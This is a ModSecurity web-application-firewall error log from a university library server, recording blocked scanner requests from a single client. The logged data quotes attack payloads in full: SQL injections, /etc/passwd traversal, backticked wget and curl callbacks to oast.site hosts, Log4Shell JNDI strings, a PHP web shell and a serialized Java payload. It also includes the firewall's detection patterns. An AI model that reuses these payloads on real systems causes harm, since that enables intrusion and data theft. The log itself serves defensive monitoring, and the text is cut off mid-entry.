[Tue Aug 29 11:34:23.594928 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASK4g8AAAAI"]
[Tue Aug 29 11:34:23.693516 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASK4hQAAAAI"]
[Tue Aug 29 11:34:25.433915 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "digilibfkip.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATzVGQAAAAx"]
[Tue Aug 29 11:34:26.088161 2023] [:error] [pid 1258] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATqf6gAAAAu"]
[Tue Aug 29 11:34:26.337703 2023] [:error] [pid 1284] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgh4o7z5o1pn3he.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUE3PMAAAA8"]
[Tue Aug 29 11:34:26.358627 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUNajAAAABF"]
[Tue Aug 29 11:34:27.578610 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAASK4hsAAAAI"]
[Tue Aug 29 11:34:28.246355 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibfkip.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11VMCo-f0AAAUCJcYAAAA6"]
[Tue Aug 29 11:34:29.324618 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAATmZcIAAAAr"]
[Tue Aug 29 11:34:29.335060 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgr3w51obn3w31w.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAATUxPkAAAAW"]
[Tue Aug 29 11:34:29.427628 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAAPLwIgAAAAX"]
[Tue Aug 29 11:34:29.507207 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgn39un3few6x8r.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAAUIz6UAAABA"]
[Tue Aug 29 11:34:30.388585 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlg3ap4bqz5o8dzd.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAAShCYcAAAAi"]
[Tue Aug 29 11:34:31.420866 2023] [:error] [pid 1279] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAAT-IXkAAAA3"]
[Tue Aug 29 11:34:32.328386 2023] [:error] [pid 1252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATkXrUAAAAp"]
[Tue Aug 29 11:34:32.338868 2023] [:error] [pid 1280] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAAUAmQkAAAA4"]
[Tue Aug 29 11:34:33.324954 2023] [:error] [pid 1252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATkXrYAAAAp"]
[Tue Aug 29 11:34:35.341200 2023] [:error] [pid 1280] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAUAmQwAAAA4"]
[Tue Aug 29 11:34:37.307476 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAATPtQ0AAAAM"]
[Tue Aug 29 11:34:38.316170 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATVtR8AAAAZ"]
[Tue Aug 29 11:34:38.327204 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgq5ez7pjieafy7.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATxvXsAAAAw"]
[Tue Aug 29 11:34:38.439347 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgo7qy1xjh8q6h4.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATfd28AAAAk"]
[Tue Aug 29 11:34:41.322198 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAUQ7rkAAABH"]
[Tue Aug 29 11:34:42.371089 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAATXLLAAAAAb"]
[Tue Aug 29 11:34:44.299650 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAATZp5sAAAAf"]
[Tue Aug 29 11:34:49.305513 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAUTiXYAAABJ"]
[Tue Aug 29 11:34:49.319796 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAShCZUAAAAi"]
[Tue Aug 29 11:34:49.324695 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAATOA9wAAAAH"]
[Tue Aug 29 11:34:49.331513 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUB01kAAAA5"]
[Tue Aug 29 11:34:51.567927 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 